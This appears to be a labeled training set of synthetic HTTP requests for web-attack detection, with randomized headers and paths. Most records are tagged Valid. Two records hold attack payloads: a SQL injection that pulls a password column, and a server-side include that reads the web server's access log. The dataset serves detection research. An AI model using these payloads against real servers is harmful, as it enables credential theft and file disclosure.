Referer: http://wiTebis.org/o0pshf1/4nd2ca/qjreao/lvtlim.asmx
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 6.7; ma-ip; rv:5.0.3) Gecko/62520821
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 279x7075
Via: pj2/6.1 58.231.161.184:7
Transfer-Encoding: deflate
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 114650430157226
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9479
Start - Id: 18319
class: Valid
GET /c_yzjKZE8/ehsnsmaknT3bww/uhEUdrN/C5eZ4Vg.asp?ooni4pttnf5h8e=rwdeI4Z6&HRue3dch-eku=nhtLiincho3u9tt&sfhloetnNLjpr=885584&DT6tdt=oiylTFk4&OMhsieejU1o=iform3ew%7EhtgPue HTTP/1.1
Host: www.i6Bimh2tqs.gov
Connection: krpu
Accept: audio/basic, application/postscript
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.6, compress;q=0.8, deflate
Accept-Language: *
Cache-Control: max-age=5274
Client-ip: 133.182.229.93
Cookie: TN35kQl=n3'fo
Cookie2: $Version="4"
Date: Sat, 24 Dec 05 11:22:10 CET
ETag: "Yy-oQQcihFak3acW"
Expect: rvsav2=sltuna;ndynn
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Thu, 01 Feb 07 20:47:10 UTC
If-Unmodified-Since: Wed, 03 May 06 07:42:49 GMT
If-Match: "CGRyCk5Lin0OA6Fsi"
If-None-Match: "8Q1SUYCtSVsX7n4JQmx"
If-Range: Wed, 25 May 05 04:00:11 UTC
Max-Forwards: 6
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Basic ZmVtYWw6aWNjdQ==
Range: 33-392,-2077,7-8592
Referer: http://www.a3fnfg9s.ch/rmdirl/etnez/snnnEhoi/IR8tca/I5lAqen.swf
TE: trailers,chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: leaas1efoi (s-lx_pH)
UA-CPU: x86
UA-Disp: 468,375,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: HTTP/6.4 www.hnosieW.jpg
Transfer-Encoding: ipml
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18319
Start - Id: 20666
class: Valid
GET /3bLC/54Y/nwidYOl9XfR2LK/omctabt3n.sh?3eeh03cgob=dIpqJvWYcmdg&ln9ietoaT1tete=EnXxuETtvloWe&odio2podoeuEq=SefnGekhnnehism&mew6ia9oHkoda=t%29ctthloggenet&S7JW1kerm569C=ys&uDDrmPLL.@kL=htash&me=1otLoa&8OhF.z0Tautoexec=t99Q4SOC&exsGAXXu=het0&zbranc=ba%3B&ae=Fi6&psctnem5Sooie=ystdinisgle+xrada+t&sCnelaeg0tfin=oZKM24%40xUCN HTTP/1.0
Host: www.dcubsw.fr:80
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: us-ascii, koi8-r, cp-932, iso-8859-9, iso-8859-9;q=0.8
Accept-Encoding: 
Accept-Language: lnwtl-a, nHn-lt;q=0.2
Cache-Control: max-stale=6
Client-ip: 186.118.225.35
Cookie: o6mau3mIrr=dpnHkyi;puaetlqndl=ler;asd5tmeg30=tednodeu
Cookie2: $Version="411"
Date: Tue, 15 Aug 06 07:25:27 UTC
ETag: "G@B-0QP3EDTa6ku"
Expect: lzbae7l0=hRllsaku
From: sxsmt@eelh.st
If-Modified-Since: Mon, 17 Apr 06 19:33:00 CET
If-Unmodified-Since: Fri, 27 Jul 07 19:22:40 UTC
If-Match: *
If-None-Match: "VlK4UmZi2oOERl4mz"
If-Range: Wed, 27 May 09 18:45:13 UTC
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: 9tds enhrjeg=1sMoeteD
Authorization: NTLM dGpib2VzbzNvcmFlNlNxdGFubGFpQnQwaGFuZTZlZEFtdXc3ZWU=
Range: 28-,-887274
Referer: /reekowte.msf
TE: chunked;q=0.8,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/8.1 (compatible; MSIE 9.8; Solaris; smn2dtlayg; ndatststie)
UA-CPU: PowerPC
UA-Disp: 268,853,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 413x553
Via: gqsoir/6.6 www.tolSfmyt.html, 0.9 152.39.0.143
Transfer-Encoding: deflate
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 122.67.136.152
X-Serial-Number: 7399609
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20666
Start - Id: 25925
class: Valid
GET /cnbetozsgrkrkyda/murg7est7ttqg/sv@RxF9Zo-t2ngHV8/uitgiqnsrm/wgetoptBR@QZJobject/dar/ele/eAtc7toz/yevmKreCrbgr.html?1rsOo=99&YADdIL.nph-=le&OlkjqTshutdownPDusrftpY=r7oR&i7oInhda2tgg=hOs1odNrnitah&e2d=1048377&nXekLE3Cr=ipzusir HTTP/1.1
Host: 36.121.5.208
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-8-i, koi8;q=0.7, iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=33
Client-ip: 151.64.233.90
Cookie: hwtFNeril3ts6=ulzaoalcete;rjeEl=UlrabdmIinnrwqcm;hhesonat=04Avoeteuehdblsdog
Cookie2: $Version="10"
Date: Mon, 09 Feb 09 17:59:07 CET
ETag: "ZrLxJWW4Lfsbyxp1kd"
Expect: Usri
From: pOyls@mejt.gov
If-Modified-Since: Tue, 28 Jun 05 07:15:00 UTC
If-Unmodified-Since: Mon, 14 Feb 05 05:12:37 UTC
If-Match: *
If-None-Match: "3wtyaVFrABLiNhi"
If-Range: Fri, 19 Feb 10 23:48:11 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: hnat riD8rdSl=brierdxs
Authorization: Digest nonce
Range: -1130,110984-785,-31
Referer: /sLepuZs/pollct/nedrn/ymj5sn.pl
TE: deflate;q=0.9,trailers,trailers
Trailer: Host
User-Agent: etZ7@s http://www.iiacw6ad.de
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: 7.1 www.itorlho.png, nsws3/8.4 www.wE1eItdl.jpeg, FTP/2.2 www.srHwd.css
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 177.96.24.239
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25925
Start - Id: 25372
class: Valid
GET /j3o1pZoopt0Weval/s3Cg67rnSc8tdl/jP_hodXatw5optsP.bin? HTTP/1.0
Host: www.tqt2.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0, utf-7;q=0.4
Accept-Encoding: deflate
Accept-Language: a4ebe2dt-fEn;q=0.1, eacrTE-Ad1, atgmt-qreee;q=0.5, Trsyrhi-Ey5od
Cache-Control: no-transform
Client-ip: 192.138.38.135
Cookie: totolhhrS6i30=07738
Cookie2: $Version="1"
Date: Sun, 13 Jun 04 23:48:52 GMT
ETag: "vrbzxGj4dKOsWsEJp"
Expect: 100-continue
From: iaomoX@nnxktO8Iw.org
If-Modified-Since: Fri, 15 Apr 05 10:22:53 CET
If-Unmodified-Since: Sun, 11 Jun 06 04:53:11 GMT
If-Match: "CHSxLwrAQomvAiKURDH"
If-None-Match: "TQpEZFkMn8Tg63MhZHnd"
If-Range: Thu, 15 Apr 10 03:51:57 CET
Max-Forwards: 23
MIME-Version: 3.9
Pragma: lnag2es='oN'
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: href n8eiba=no8gf
Range: 4947-
Referer: http://zavxt3qe.de/lcutZg9/essodok/sd5rd/slhaltbm/s3iaosik.tiff
TE: gzip,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: 1NMed (rzbvYNpko; nQ_PZe; mjSA5I-d; yF1f7-T)
UA-CPU: 68000
UA-Disp: 071,871,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 894x439
Via: 3.7 163.218.239.94:8, egsoi/2.9 www.hsrb.htm, 0.1 43.87.245.166
Transfer-Encoding: aphnf
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 150.249.43.63
X-Serial-Number: 5812967
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25372
Start - Id: 29463
class: Valid
GET /ayzgdi0tyain/hq_cQ2-T7fbym/tQAQtoykq.htm?usoali=49988&joJQPBZ=45&biM9=hntsfvao&i6eeiezc5=tm%40IqsjiVfK&eaikiuiimt=ea&dte1e5Sia=hcN.fa54Xc HTTP/1.1
Host: www.desFaHnt.gov
Connection: close
Accept: audio/basic;q=0.5, video/*;q=0.8
Accept-Charset: isiri-3342, macintosh;q=0.8
Accept-Encoding: *
Accept-Language: u02-i, s-ba;q=0.9, ssTe-ennbtn, atsiSnn-ob
Cache-Control: max-age=965
Client-ip: 72.20.4.11
Cookie: heuol=336836358;meaklndn=e;yBWOJX5=5ANOr9.;eeutloaay3Ith=on6ed;y6Qe5=(;rhilipgamoagn=|Tlr
Cookie2: $Version="749"
Date: Mon, 08 Feb 10 14:20:51 UTC
ETag: "xLrsNsTOPTUionq"
Expect: mtsvart=rtdaer;Ajtt4Ne=ndsnet5
From: 3eefJz@tepiieo.org
If-Modified-Since: Sat, 16 Dec 06 13:40:21 UTC
If-Unmodified-Since: Mon, 15 May 06 21:27:42 CET
If-Match: *
If-None-Match: "pmyzIbzL9D8RBwv7tmuS"
If-Range: Thu, 02 Jun 05 19:34:57 UTC
Max-Forwards: 1672
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: NTLM YXI0b3duY2huZXNCYXNudG9penkyeG1iM3Vod2RPZXZpdGhrZGVz
Range: 79719-,-15,5725-6080
Referer: http://www.tito5ip.be/zm0ialxI/veme/oHsaent.mdb
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 6.4; De-ed; rv:9.3.0) Gecko/24928298
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6889x7208
Via: oeens/6.5 www.iloa3otV.shtml
Transfer-Encoding: compress
Upgrade: s1t2mc/5.1, ien6g/6.9, eou/7.3, wnt/9.2, inbt/4.4
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29463
Start - Id: 35134
class: SqlInjection
POST /w_dQlF63xd8chdxgAjxn/nenReoedttAokeuear4/dc2lHyEOB1/ehaaef26iFn/VAd1RicBWf.php3? HTTP/1.0
Content-Length: 270
Content-Language: zpst2eoi,1w
Content-Encoding: compress
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: YnJncnlwbmd4ZWxvcnVkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Sun, 15 Oct 06 04:16:43 GMT
Host: www.M9cif.st
Connection: close
Accept: image/jpeg, text/*;q=0.0, image/gif
Accept-Charset: *
Accept-Encoding: compress;q=0.9, gzip;q=0.2, compress, identity;q=0.0, gzip
Accept-Language: hgpkJi-t, ecl9rrP-dulldr;q=0.1
Cache-Control: only-if-cached
Client-ip: 119.220.168.61
Cookie: 4nab6ezjei=rfa
Cookie2: $Version="43"
Date: Sun, 10 Dec 06 12:06:44 CET
ETag: "wECWPXUQhi-PB9N"
Expect: ia7oljae
From: M1ef@dtSta5dnW.gov
If-Modified-Since: Tue, 02 Oct 07 23:47:18 GMT
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: "M0LupsC6@K6@9D7"
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 32
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: 03hTlE Tqem=cllmecx
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: /elooIca/Unesahi.asmx
TE: trailers,chunked;q=0.4
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 2.6; tr-af; rv:8.9.5) Gecko/63241951
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: ratUn; isTmXtg=raertl
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Emtihsn=h19gMVtPfTNO&geauctjAsozsOi=';  begin    declare @ret  varchar(8000)    set   @ret=':'    select    @ret=@ret+'  '+2br+'/'+password    from tLudnt where  Xhsi>@ret     select     @ret  as   ret    into  foo end--

End - Id: 35134
Start - Id: 9604
class: Valid
GET /oMNtzm0Dqp.jpg?drd=errtr&78igmdntfdW6g=nsr7 HTTP/1.1
Host: www.inei.de
Connection: noU9iEei
Accept: */*
Accept-Charset: utf-7, iso-8859-4, shift_jis;q=0.8, big5;q=0.0
Accept-Encoding: *
Accept-Language: lotp3t-ee;q=0.0, a-sl;q=0.9, eadNene-2
Cache-Control: min-fresh=06102
Client-ip: 199.188.155.90
Cookie: 6jeRi6pijoisue=ebt?$;p1E7=Rtyyoe2boxdooiwna;4fqs=ypgX@J1Rr
Cookie2: $Version="722"
Date: Fri, 27 Apr 07 18:25:33 GMT
ETag: "Z0xxwaW4lTUQ8yUbSmS"
Expect: 100-continue
From: wsedel@fte2.org
If-Modified-Since: Thu, 28 Aug 08 08:11:38 UTC
If-Unmodified-Since: Sun, 27 Feb 05 03:07:18 UTC
If-Match: "Re686qYfm3LtRLu"
If-None-Match: "yYnc0WJCi0OAoOaLSGs"
If-Range: "tjlOpRk7hck3Ek0V3gO"
Max-Forwards: 9
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: iOexxu luao7=rm6admp
Authorization: NTLM b2hOc2N4OGF0ZXNhaWhyc2FpM2VlYWUyMmxlc25zZHplRGh1cm1zemUycnNoelR0
Range: 218320-0,0-,8-66598
Referer: /Lm2ags4/dqjnlpr/ma5i6cn/oeoncso/m9o5lr.png
TE: trailers,deflate;q=0.1,chunked;q=0.1
Trailer: Warning
User-Agent: Mozilla/4.7 (X11; U; Unix 1.8; in-ai; rv:4.1.4) Gecko/89258294
UA-CPU: 68000
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: gzip
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 225.176.97.169
X-Serial-Number: 0359869
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9604
Start - Id: 39580
class: SSI
POST /0gi3Nrifti/sNZtYgDpP-Uh/vUw-y8M3/l2Ss57Kwt_G5.-.b/apdpdtmonenqon/dfX_Y1fUH.yhV.zcBHyb/MxkVd/ewS7prJiekJMye3KxLl/apVqATbNOaK52.html? HTTP/1.1
Content-Length: 82
Content-Language: zB
Content-Encoding: identity
Content-Location: /esde/5leeiob/tu3uld/2Oc0noe/qNmei.wmn
Content-MD5: RXFvdHJtam5TYmNvYVNrdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 16 May 08 23:14:59 CET
Host: www.atkhznnS.com:667
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.8
Accept-Encoding: compress, gzip, deflate;q=0.1, identity
Accept-Language: *
Cache-Control: max-stale=50856
Client-ip: 57.187.43.49
Cookie: xinl=@adminfssama?;koVincludeimg6styleQ=tue?;TbinGQR7Xg=jafff0secase9;foe=3;MXC@h=6s6mailaid
Date: Mon, 24 Nov 08 16:38:53 GMT
ETag: W/"acVHAgOu9a8kq4w51"
Expect: 100-continue
If-Unmodified-Since: Fri, 16 Jan 04 22:15:54 UTC
If-Match: *
If-None-Match: "onIDAp@BcEM6jSwwm"
If-Range: Fri, 16 Jun 06 06:36:24 GMT
Max-Forwards: 7082
Pragma: no-cache
Referer: /eutrmox/qO7ibke.nsf
TE: gzip
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 8.4; dj-eb; rv:4.4.2) Gecko/32738725
Via: HTTP/6.8 www.Z7dSd.gif, 2.2 3.84.135.203
X-Forwarded-For: 164.198.118.70

iAb=<!-- #include virtual="/var/log/httpd/access.log"    -->

End - Id: 39580
Start - Id: 30486
class: Valid
GET /9@IveZUaFU1gthESykR2/ItIwinnt4728ZST5access_logfi/wai/yinr/th/3Ks_aKVky9hbuEXpmp/3gr0repp49ban3.swf? HTTP/1.1
Host: www.dtClocoO.cz
Connection: keep-alive
Accept: video/quicktime;q=0.3, video/*
Accept-Charset: iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: nT4pdhe-vesperj4;q=0.2
Cache-Control: no-transform
Client-ip: 14.178.222.69
Cookie: samIrNBxENMyh=pczzeODX
Cookie2: $Version="618"
Date: Tue, 09 Dec 08 02:07:14 UTC
ETag: W/"vxgxcMBzfTB9wWE"
Expect: 100-continue
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Tue, 17 Aug 04 08:54:01 GMT
If-Unmodified-Since: Wed, 11 May 05 21:47:23 UTC
If-Match: *
If-None-Match: "VdX.spbZYBYKujcDVXd"
If-Range: *
Max-Forwards: 833
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bWVkbDp0N21t
Authorization: Digest algorithm=MD5
Range: 32-29,033002-861540
Referer: /Llwtseke/t7l2eu/owgc/lhoh/iiieit.bin
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: 9cl_Dv http://www.syieae.fr
UA-CPU: x86
UA-Disp: 910,8776,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 710x3564
Via: 6.1 13.34.166.113, 6.2 45.96.151.160, HTTP/0.3 236.103.132.194
Transfer-Encoding: compress
Upgrade: tsn/6.7
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 205.107.245.45
X-Serial-Number: 9887656877315806
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30486
Start - Id: 290
class: Valid
GET /a0IM0l4B4bCEN7MKJ/eRu9oOooetna/AstylewObodydAd8P/aIeyUe8fiuncg/ensowtnevxyu/t.V4Q3.wydYcpiCb/tpiysafeeic/iCIbjzKX/4tlnia82aaitseenH/ehetbeoirt55.mspx?hnese=nvReiframed%3FdtiftT&fzjyanVdcEpst=5593&S8knnEsx3aegee=dp2KmG%40Gz3RF&He4nTatRecqo=goo%7Cmt HTTP/1.0
Host: 12.38.40.53:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-15, iso-2022-jp, x-mac-chinesetrad;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: 28itsr-rytsF;q=0.9
Cache-Control: min-fresh=433
Client-ip: 120.251.90.4
Cookie: Kbg4=wKi7z.j
Cookie2: $Version="63"
Date: Tue, 12 Jan 10 15:45:53 GMT
ETag: "B-WOIA7_Juo070G2GXzx"
Expect: 100-continue
From: atOG@okZhh.fr
If-Modified-Since: Sun, 01 Mar 09 23:18:55 GMT
If-Unmodified-Since: Wed, 23 Mar 05 04:10:17 UTC
If-Match: *
If-None-Match: "63joYmqnhR2a0oagk"
If-Range: Mon, 05 Apr 04 13:27:00 UTC
Max-Forwards: 6
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: NTLM YUticmVmc0ZkMXF1eGFrcGRxb250d3c3ZDdkbGFlaHZncW9veWE2
Range: 126252-010334,-647
Referer: /daEbalow/1enudct/os4heep/2ISeug.swf
TE: trailers,deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/4.8 (Windows; U; WinNT 1.9; gw-Si; rv:5.9.1) Gecko/61217512
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 2.9 171.132.11.34, ibseqa/8.4 209.202.66.67:5213, 4.0 www.hyewf.png
Transfer-Encoding: compress
Upgrade: aeeh/6.3, fgRaE/4.4
Warning: 115 www.hone.jpeg "q3i0Eo0DcebhmerEuNtI" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 3817117496295
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 290
Start - Id: 18343
class: Valid
GET /tPoPuCJVAtjpS7f-8.css?haye=%5Bsmn&decwuDMeonkius=ivIsZ HTTP/1.0
Host: 21.1.23.1
Connection: h821Tejt
Accept: text/xml, video/quicktime;q=0.7, application/*
Accept-Charset: iso-8859-3, x-mac-icelandic, x-mac-ce;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=5
Client-ip: 159.233.57.166
Cookie: eKmeat9S=sae]0irh
Cookie2: $Version="21"
Date: Fri, 22 Oct 04 01:54:23 CET
ETag: W/"FrEg431hhzfkL2r1zPs"
Expect: 100-continue
From: tehgh57h@ejdoaoe.gov
If-Modified-Since: Sun, 07 May 06 15:21:57 CET
If-Unmodified-Since: Sat, 23 Feb 08 16:31:01 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5217
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: tmpnI ltce=qcsehOsO
Range: 1528-
Referer: /eop6tn/t0UaOyH/b0wmig/dni37.jsp
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/2.6 (X11; U; Unix 7.5; lR-ir; rv:5.2.9) Gecko/06830552
UA-CPU: x86
UA-Disp: 350,951,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.4 67.76.201.40, 6.3 29.53.223.172
Transfer-Encoding: gzip
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 292738
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18343
Start - Id: 6932
class: Valid
POST /UHpasswdIU3YidMwhere/M7tinosdJ/hoareltop8n8eheeuao/2eudmt/iEsr/lWmhnbeSer/leoilbge6ev/nlgoNNerfmieDe/rHxMsm-EUGf2tFBpmc4/nAlcobWlvimXEs.js? HTTP/1.1
Content-Length: 228
Content-Language: t,bbmlott,Ist
Content-Encoding: gzip
Content-Location: http://sroci.gov/r9os/aiomsed3.dll
Content-MD5: TU82b2ZyaGVmbmlkMGhocw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 01:28:22 GMT
Last-Modified: Sun, 01 Oct 06 02:18:32 CET
Host: www.klehtse4.org:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: utf-8;q=0.1
Accept-Encoding: deflate;q=0.2, identity
Accept-Language: yo-srhreS;q=0.6, bneCeru-rskt2hlt, iE5i-cani
Cache-Control: no-cache
Client-ip: 182.144.239.94
Cookie: oescD5i=snsihttpil mlNlaiB;sthtoi=5;ymdrzvoEookuuah=3
Cookie2: $Version="17"
Date: Wed, 24 Oct 07 10:56:10 CET
ETag: "zKisQxlcWUKzaqRil"
Expect: a7cnsma=bhd8fwt
From: 9tasgo@r6haat.org
If-Modified-Since: Wed, 07 Apr 10 15:38:02 CET
If-Unmodified-Since: Sun, 11 Feb 07 03:35:46 CET
If-Match: "dhlclUEWeVOZimW"
If-None-Match: *
If-Range: Mon, 22 Oct 07 22:29:50 UTC
Max-Forwards: 15
MIME-Version: 6.9
Pragma: urt18th='vo'
Proxy-Authorization: obntn ETroq=muk2
Authorization: isxT ertcBten=6lpeAts
Range: -35,310954-4,-65030
Referer: /aNieit.txt
TE: trailers
Trailer: From
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 9.8; ye-6o; rv:3.4.6) Gecko/50738526
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9121x8354
Via: HTTP/9.1 212.73.118.26, 5.5 www.r3tis8r.jpg
Transfer-Encoding: identity
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 311516057491
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

h9dee9sNy7file=2263203&Ostry=pcate  g eusroo&t3me3zt=yellc&qnqNqoigsetfa=af8MY5gi18&recacabSwcii=ao3matttdTdTmthav&tner=938305546&er5mheePauLw3=roae&sadr=xp_deletei7(t &nrhksgh4rr=hlc&einv2lhaol7oei=idseisetpr&rc9atd=062674647

End - Id: 6932
Start - Id: 20394
class: Valid
GET /uqozeeca/huR1L/mhnnInvhclaecn/e3EQumO7oa50vOJ87/oQ.C..5yP/TAetsandsuc4femd/ad/b_4/yox.nsf?cUs8tklnniemeoy=uopensTiSn&NLa2W4pZ=l+&aciodM=seAj&pumttubItvwl=s&fZUY=fhs2wertiy2Sko&RHaeeh=41469&alee6s=%3A&tramIhmkbLdtie=owrdo%275&ke=rnaore&oaorIUahteob4=9977&C8ejlEohivt=OskohpistneeigW&aeyybeitnue=srmys3ln%293n%29%40&so3hTisn=ahtpasson4qei+1r%40c%3EiNvenl&DYRuifhhatreea=aoVsGiduxaJ-&gsie3eteoaec=taF5pk HTTP/1.0
Host: www.PaNee2amt.fr
Connection: nqn9Spsd
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.5, identity;q=0.1, deflate, gzip
Accept-Language: j4rtaset-cd, ea6yn4-s;q=0.9, ri-ta7gone;q=0.6, iy-iSvlipv;q=0.1, n-e
Cache-Control: no-cache
Client-ip: 115.20.170.209
Cookie: me=aot+Tqau=httpsn
Cookie2: $Version="5"
Date: Wed, 24 Dec 08 09:11:16 GMT
ETag: W/"KSSTKH7SBe30gRd"
Expect: eS2n2h1
From: 0kae9sa@oq7ndrr.de
If-Modified-Since: Sat, 01 Dec 07 23:28:53 UTC
If-Unmodified-Since: Sat, 15 Jul 06 11:33:03 GMT
If-Match: *
If-None-Match: "Jj6JRK8SOQ8_fwHOXMn"
If-Range: "Gkm3b5gqNPij.RLjo@"
Max-Forwards: 379
MIME-Version: 8.6
Pragma: b='enepwn'
Proxy-Authorization: NTLM ZW5zdGxldGxBeG5lOWV5aWVvaWhiY29lYnJtaXhuZWVldw==
Authorization: Basic OXlpZGVJMTA6UjUyY21k
Range: -21727,-97
Referer: http://ztzre2.it/Nrn1yr/hNi2.php3
TE: trailers,trailers
Trailer: Authorization
User-Agent: 4hceu/3.1.2.2
UA-CPU: 68000
UA-Disp: 8020,2426,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: 4.0 www.rrtld.js, 8.2 www.encHaS.shtml, 7.5 220.244.140.32
Transfer-Encoding: identity
Upgrade: otcmsa/8.6, iEye/1.3, dkmh/3.7, otrl/7.1
Warning: 668 77.12.111.43 "n6wsowsinh7xC" 
X-Forwarded-For: 167.64.131.250
X-Serial-Number: 13904679569976
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20394
Start - Id: 18092
class: Valid
GET /fCitfok1a.asmx?eNnoalth=04960&dnncchEtii=nng&sexeoe=w+&iHe0pNaSruet=%26y7w&nddOtq=159&esemnbees=5930&ygm=wGlT&pecl9s=ht+y&emxadlyckaoe6rn=2873&le5dfarie=Wmbetweenu HTTP/1.0
Host: www.rDecso.ch
Connection: rvnNt
Accept: application/zip, application/*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.5
Accept-Language: n6-t0lKe;q=0.2
Cache-Control: max-age=1
Client-ip: 14.203.190.107
Cookie: mcrtubaanxry7cs=2135;dse1yso0s7drl=rg9fbQip;1hj35Srrfeoe=te07erisreneaPydji;mA=httpsihi;omug2noab2xeha=alinkgroup byihp 4inputHi7inputp0d
